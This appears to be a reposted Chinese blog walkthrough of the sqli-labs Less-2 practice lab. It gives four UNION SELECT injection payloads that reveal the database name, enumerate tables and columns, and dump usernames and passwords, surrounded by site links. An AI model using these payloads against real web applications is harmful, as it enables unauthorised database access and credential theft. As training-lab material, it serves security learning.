【SQL注入】Less-2错误型GET整型注入 - 代码天地

【SQL注入】Less-2错误型GET整型注入

其他 2021-04-06 18:53:48 阅读次数: 0

Less-2错误型GET整型注入

什么是整形注入?可以理解位提交的URL参数为整数类型。

实验漏洞复现介绍

该实验与Less-1错误型GET单引号字符型注入 区别在于，构建payload时去掉'单引号

1、爆开数据库

payload

?id=0 union select 1,2,database() --+

2、爆开数据表

payload

?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

3、表开数据列(字段)

payload

?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

4、爆开数据值

payload

?id=0 union select 1,group_concat(username,0x3a,password),3 from users--+

猜你喜欢

转载自blog.csdn.net/Mitchell_Donovan/article/details/115335714

【SQL注入】Less-2错误型GET整型注入

Sql注入之Sqli-labs Less-2

【SQL注入】Less-1错误型GET单引号字符型注入

【SQL注入】Less-4错误型GET双引号字符型注入

【SQL注入】Less-3错误型GET单引号变形字符型注入

【SQL注入】Less-5双注入GET单引号字符型注入

【SQL注入】Less-6双注入GET双引号字符型注入

【SQL注入】Less-7导出文件GET字符型注入

【SQL注入】Less-12基于错误的双引号POST字符型变形的注入

【SQL注入】Less-11基于错误的POST单引号字符型注入

less 4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）

SQL注入2（报错型注入）

less 3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

less-2

2021-11-09 SQL注入---字符型注入（GET）

SQL练习（less-6）字符型&报错注入

SQL练习（less-4）双引号字符型注入

SQL注入——报错型注入

GET sql注入

SQL注入GET参数

Sql之GET注入

SQL注入——GET类型

SQL注入——Less-1

SQL注入之报错型注入

SQL注入——字符型union注入

Sqli-Labs之less-2

sqli-labs：Less-2

sqli-labs Less-2

sqli-lab教程Less-2

GET基于报错的SQL注入

今日推荐

周排行

win7之session理解

如何快速上手 AB Testing ？阿里技术专家秘方公开

数据库自助查询平台

【CCF 2017-12-2】游戏问题

Fire!(BFS)

修复GRUB引导故障

老倪祖膏药分销系统

MySQL慢查询日志-捕获慢SQL

批归一化(Batch Normalization)

ssm整合问题-------一

每日归档

更多

2025-03-02(0)

2025-03-01(0)

2025-02-28(0)

2025-02-27(0)

2025-02-26(0)

2025-02-25(0)

2025-02-24(0)

2025-02-23(0)

2025-02-22(0)

2025-02-21(0)